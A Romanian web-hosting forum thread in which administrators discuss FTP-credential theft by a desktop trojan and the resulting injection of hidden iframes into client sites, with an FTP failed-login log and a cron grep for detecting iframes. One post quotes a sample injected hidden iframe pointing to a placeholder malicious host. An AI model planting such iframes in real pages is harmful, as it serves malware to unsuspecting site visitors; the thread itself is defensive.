Atac live pe ftp

[Gupi]

Uite cam asa se desfasoara un atac pe FTP cu inserare de iframe
1) parola de acces este gasita prin diverse metode (keylogger, exploit pe site prost, etc)
2) codul iframe este incarcat de la o gramada de adrese, pentru a nu fi blocate de filtre

Cam asa arata log-ul ftp pentru user compromis si apoi curatat. Tentativele continua.

Aug 14 10:46:03 server.name pure-ftpd: (?@121.166.105.94) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:46:05 server.name pure-ftpd: (?@89.28.98.15) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:46:10 server.name pure-ftpd: (?@200.83.8.57) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:46:13 server.name pure-ftpd: (?@80.98.134.250) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:46:25 server.name pure-ftpd: (?@114.58.105.136) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:46:32 server.name pure-ftpd: (?@115.184.118.249) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:46:40 server.name pure-ftpd: (?@123.201.73.24) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:46:49 server.name pure-ftpd: (?@61.224.100.215) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:46:53 server.name pure-ftpd: (?@68.106.143.104) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:46:58 server.name pure-ftpd: (?@190.247.32.11) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:47:07 server.name pure-ftpd: (?@99.252.249.221) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:47:21 server.name pure-ftpd: (?@141.225.71.170) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:47:26 server.name pure-ftpd: (?@24.37.224.241) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:47:30 server.name pure-ftpd: (?@200.125.126.194) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:47:34 server.name pure-ftpd: (?@85.232.127.210) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:47:47 server.name pure-ftpd: (?@190.49.36.2) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:48:10 server.name pure-ftpd: (?@61.229.157.135) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:48:14 server.name pure-ftpd: (?@88.77.15.19) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:48:19 server.name pure-ftpd: (?@85.64.83.33) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:48:24 server.name pure-ftpd: (?@85.65.4.90) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:48:34 server.name pure-ftpd: (?@98.156.73.191) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:48:42 server.name pure-ftpd: (?@219.77.79.187) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:48:45 server.name pure-ftpd: (?@62.85.122.186) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:48:52 server.name pure-ftpd: (?@190.230.197.107) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:49:01 server.name pure-ftpd: (?@61.230.216.5) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:49:06 server.name pure-ftpd: (?@87.55.58.65) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:49:09 server.name pure-ftpd: (?@86.105.116.78) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:49:14 server.name pure-ftpd: (?@115.98.200.62) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:49:21 server.name pure-ftpd: (?@77.40.88.124) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:49:23 server.name pure-ftpd: (?@88.174.28.147) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:49:28 server.name pure-ftpd: (?@92.68.94.237) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:49:33 server.name pure-ftpd: (?@219.68.112.158) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:49:39 server.name pure-ftpd: (?@89.218.162.122) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:49:42 server.name pure-ftpd: (?@81.9.254.175) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:49:45 server.name pure-ftpd: (?@92.53.8.48) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:49:56 server.name pure-ftpd: (?@119.95.210.171) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:49:59 server.name pure-ftpd: (?@62.21.28.149) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:50:02 server.name pure-ftpd: (?@83.25.27.152) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:50:09 server.name pure-ftpd: (?@69.1.54.242) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:50:14 server.name pure-ftpd: (?@89.138.141.115) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:50:27 server.name pure-ftpd: (?@75.116.238.110) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:50:33 server.name pure-ftpd: (?@98.183.238.90) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:50:43 server.name pure-ftpd: (?@112.200.184.87) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:50:46 server.name pure-ftpd: (?@79.118.202.160) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:50:51 server.name pure-ftpd: (?@69.242.156.192) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:50:56 server.name pure-ftpd: (?@87.223.212.1) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:50:59 server.name pure-ftpd: (?@79.119.19.247) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:51:03 server.name pure-ftpd: (?@93.113.147.31) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:51:10 server.name pure-ftpd: (?@201.246.48.238) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:51:15 server.name pure-ftpd: (?@92.82.209.28) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:51:21 server.name pure-ftpd: (?@124.85.10.209) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:51:27 server.name pure-ftpd: (?@123.205.242.88) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:51:34 server.name pure-ftpd: (?@189.172.143.68) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:51:39 server.name pure-ftpd: (?@84.47.17.70) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:51:47 server.name pure-ftpd: (?@218.163.249.66) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:51:50 server.name pure-ftpd: (?@147.31.141.101) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:51:55 server.name pure-ftpd: (?@94.72.116.45) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:51:59 server.name pure-ftpd: (?@93.113.83.249) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:52:03 server.name pure-ftpd: (?@79.186.233.198) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:52:10 server.name pure-ftpd: (?@190.49.54.235) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:52:14 server.name pure-ftpd: (?@85.67.127.191) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:52:17 server.name pure-ftpd: (?@87.96.190.149) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:52:22 server.name pure-ftpd: (?@97.106.139.229) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:52:28 server.name pure-ftpd: (?@117.204.96.231) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:52:31 server.name pure-ftpd: (?@89.77.160.32) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:52:36 server.name pure-ftpd: (?@80.70.4.240) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:52:39 server.name pure-ftpd: (?@85.152.90.105) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:52:42 server.name pure-ftpd: (?@212.96.62.1) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:52:45 server.name pure-ftpd: (?@62.21.28.149) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:52:47 server.name pure-ftpd: (?@86.124.193.126) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:52:51 server.name pure-ftpd: (?@85.226.34.183) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:52:54 server.name pure-ftpd: (?@85.196.178.36) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:52:58 server.name pure-ftpd: (?@94.170.134.123) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:53:04 server.name pure-ftpd: (?@140.109.91.195) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:53:08 server.name pure-ftpd: (?@82.131.188.228) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:53:10 server.name pure-ftpd: (?@212.73.173.32) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:53:17 server.name pure-ftpd: (?@201.239.94.117) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:53:23 server.name pure-ftpd: (?@81.196.86.165) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:53:27 server.name pure-ftpd: (?@78.63.178.94) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:53:33 server.name pure-ftpd: (?@115.186.16.35) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:53:46 server.name pure-ftpd: (?@84.73.109.21) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:53:51 server.name pure-ftpd: (?@89.35.155.29) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:53:59 server.name pure-ftpd: (?@119.95.210.171) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:54:04 server.name pure-ftpd: (?@187.131.221.187) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:54:09 server.name pure-ftpd: (?@188.24.114.186) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:54:15 server.name pure-ftpd: (?@89.138.141.115) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:54:22 server.name pure-ftpd: (?@190.189.65.124) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:54:23 server.name pure-ftpd: (?@95.64.86.65) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:54:34 server.name pure-ftpd: (?@59.117.173.204) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:54:46 server.name pure-ftpd: (?@122.125.37.227) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:54:56 server.name pure-ftpd: (?@77.81.227.59) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:55:04 server.name pure-ftpd: (?@201.255.56.239) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]
Aug 14 10:55:08 server.name pure-ftpd: (?@83.11.204.102) [WARNING] Authentication failed for user [xxxxxxxxxxxxx]

[petrescs]

Salut Gupi, ma intereseaza subiectul, ar fi util daca poti detalia putin te rog.
Logul pare a arata incercari brute force de autentificare, exista pe altundeva inregistrate si semne de injectare iframe?
Nu a putut fi detectat de csf/lfd?

[Gupi]

@petrescs, clientul fusese hăcuit începând de ieri noapte.
Nu au fost semne de brute-force şi de aceea mă gândesc la keylogger sau sniffer in retea de cartier.

Ideea e că odată verificate datele de autentificare, site-ul este 'teleportat' pe foarte multe adrese IP diferite şi apoi fişierele modificate (cu inserţie de iframe) sunt urcate înapoi pe server la fel, de pe foarte multe adrese IP.

Nu se fac conexiuni FTP multiple, sau altfel spus:
- se conectează IP1, uploadează fişierul /path1/to/index.php, apoi se deconecteaza.
- se conectează IP2, uploadează fişierul /path2/to/index.php, apoi se deconecteaza.
samd.

csf/lfd e ineficient aici, deoarece fiind asa multe adrese IP zombie, nu apucă să declanşeze trigger-ul de (sa zicem) 10 autentificari nereusite in 2 minute. Secventa de log e preluata imediat dupa modificarea parolei de acces FTP si iti poate da o imagine a vârfului iceberg-ului.

[petrescs]

Secventa de log e preluata imediat dupa modificarea parolei de acces FTP si iti poate da o imagine a vârfului iceberg-ului.

Acum inteleg - am crezut ca fragmentul de log arata starea "inainte" de atac, parea clar o succesiune de incercari nereusite user/pass. Daca atacatorul stia parola din alte surse si a intrat la sigur cu ea, secventa nu putea fi deloc evidentiata comparativ de alte logari legitime. Decat poate daca s-ar face pe viitor o limitare a accesului pe portul ftp doar de la una sau mai multe IP considerate "sigure" (nu stiu vreo solutie simpla pentru clientii cu dhcp).

Multumesc de detalii.

<offtopic> Cum de mai supravietuieste FTP in zile noastre? Chiar este un serviciu critic in industria de hosting?</offtopic>

[Mihai RADULESCU]

Pot sa confirm ca in ultimul timp, si aici ma refer la ultimele luni de zile s-au inmultit aceste tipuri de atacuri. Am investigat si noi problema la nivel de client iar in 90% din cazuri nu a fost vorba de sniffer sau keylogger.

Era vorba de calculatoare infectate dupa care se facea Upload. Infectarea PC-urilor consta intr-un troian care pur si simplu citea fisierele care stocheaza user+pass ale conturilor de FTP din clientii de FTP.

Citez din mesajul unui client :

"Este vorba de un fisier .exe (C:\Documents and Settings\tgabi\Start Menu\Programs\Startup\ikowin32.exe) .AVG-ul nu l-a scos, am incercat Kaspersky cu care am reusit sa-l elimin in prima faza, dar se pare ca virusul ramasese rezident in calculator, si continua sa trimita informatii catre persoane(computere) rau voitoare. Recomand, ceea ce am facut si eu de altfel, FORMATAREA si Reinstalarea SO-ului."

Cel mai vulnerabil se pare a fi CuteFTP.

Gupi are dreptate. Clar ca nu se poate filtra sau bloca automat din CSF/LFD, singura posibilitate ramane aceea a schimbarii parolei clientului, anuntarea acestuia, devirusare etc...


Succes!

[Andrei G.]

Si cea mai faina distractie e sa ai client care nu intelege acest lucru si crede in continuare ca e vina hosterului.

[Mihai RADULESCU]

Andrei, sa stii ca majoritatea sunt 100% SIGURI ca este vina Furnizorului

Te chinui, le explici (neaparat cu exemple si pana la urma inteleg. La cei mai multi dintre ei, oricum tu o sa le rezolvi problema. Change Password si apoi refacere fisiere corupte din backup.

Daca s-a descoperit tarziu, e posibil ca si instantele de backup sa fie corupte.

[petrescs]

E clar, in cazul asta nici filtrarea dupa IP nu mai tine, totul pleaca chiar de la calculatorul infectat al ownerului, fara cunostinta acestuia. Nu am gasit detalii despre ikowin, dar am banuiala ca nu se uita doar prin fisiere (cuteftp tine parolele in clear text?) ci are si keylogger integrat. Caz in care nu prea vreau sa ma gandesc la intimitatea respectivilor pe online.

Sunt perfect de acord ca un provider nu poate acoperi 100% masurile de siguranta necesare, majoritatea atacurilor tintesc oricum slabiciunile naturii umane si/sau platformei client.

[Adrian Andreias]

Tipul serverului de ftp nu are de-a face cu faptul ca un virus a capturat o parola de ftp.

[Mihai RADULESCU]

@Petrescs Da zici bine, cred ca este vb si de keylogger.

Oricum, atacatorul tind sa cred ca este un server "hackuit" pe care sunt instalate scripturi care fac toata tarasenia asta .(sau mai multe servere corupte).

Cea mai simpla verificare din XP in cazul in care virusul este scos dar totusi PCul este suspect, cu un simplu netstat se poate verifica ce conexiuni se deschid pe calculatorul respectiv.(toate aplicatiile de internet sa fie inchise)

Deobicei sunt conexiuni pe portul 25.

Ce nu am inteles totusi este faptul ca s-a intamplat la clienti care au ca ISP, RDS-ul iar acesta stiu ca filtreaza portul 25 pe Ftth.

Probabil mai exista si o alta cale de trasnmitere a informatiilor.

[petrescs]

@Mihai: Cei cu outbound tcp/25 sunt de obicei spambots; daca nu au altceva mai interesant de facut (cum ar fi ddos la comanda), trimit spam ca sa nu someze.

Probabil mai exista si o alta cale de trasnmitere a informatiilor.

Exista destul de multe, dar cele mai raspandite raman in continuare greselile umane - utilizatorii dau clic intr-o veselie pe link-uri dubioase pe web sau IM sau pe mail attachments de la necunoscuti, fara nici o jena. Dar asta, bineinteles, dupa ce si-au luat toate masurile de siguranta si au descarcat un "best deal antivirus - free offer for you're the 999999 visitor" din primul popup afisat in toate culorile curcubeului. Sau latest version firewall pro de pe torente, ca e trendy sa lucrezi @home cu versiuni pro/enterprise crackuite. Go figure.

Daca te pasioneaza cifrele, au facut unii niste statistici http://blog.trendmicro.com/most-abused-infection-vector/ - sunt convins ca rapoartele o sa fie cam tot pe-acolo si peste 100 de ani.

[Gupi]

Pana ca una alta, ca tema de week-end eu va sugerez sa faceti o cautare de control in toate fisierele de pe servere, dupa cuvantul "<iframe".
S-ar putea sa aveti surprize.

[petrescs]

@Gupi: Tema banuiesc ca e pentru cei care folosesc ftp, nu? :-)

Oricum, in caz ca mai sunt si alte portite deschise pentru troianul asta, ma pregatesc si eu cu urmatoarea in cron

Cod: [Selectează]

grep -rin "<iframe" /path/to/webroot | mail -E -s "iframe found!!!" me@mydomain.com
Optiunea -E e buna ca sa nu trimita mailul decat daca grep returneaza ceva (mail body != empty)

[Mihai RADULESCU]

Pana ca una alta, ca tema de week-end eu va sugerez sa faceti o cautare de control in toate fisierele de pe servere, dupa cuvantul "<iframe".
S-ar putea sa aveti surprize.

doar "<iframe" nu este cam general?

iframe-ul cu care erau "injectate" site-urile unor clienti aveam codul urmator:

<iframe src=”http://numesite.tld:8080/ts/in.cgi?pepsi116″ width=125 height=125 style=”visibility: hidden”></iframe>

Asta ar fi un exemplu. Rulati cautari la anumite perioade de timp.

@petrescs Intr-adevar pe 25 s-ar putea sa trimita SPAM. Probabil troianul de care-ti spuneam este multi functional.

Totusi ma gandeam si la posibilitatea de a trimite datele colectate catre Hackeri chiar pe mail si de aceea existau conexiuni pe 25.

Weekend placut!

[Gupi]

@petrescs tema e pentru toti hosterii.
Nu e rusinos sa dai dulapurile le o parte si sa cureti goangele.

Pe de alta parte, problema e ca exista o multime de fisiere ce au cod iframe valid: WordPress, Drupal, Joomla, fisiere custom samd.

Un astfel de cod este un inceput excelent, dar in timp o sa te cam enerveze.
Solutia mai 'umana' ar fi sa primesti zilnic un sinopsis (nu 300 de mesaje) cu liniile de cod ce contin iframe.
Ma gandesc de exemplu că script-ul din cPanel ce trimite sinopsisul cu fisierele ce contin functia "mail" ar putea fi adaptat.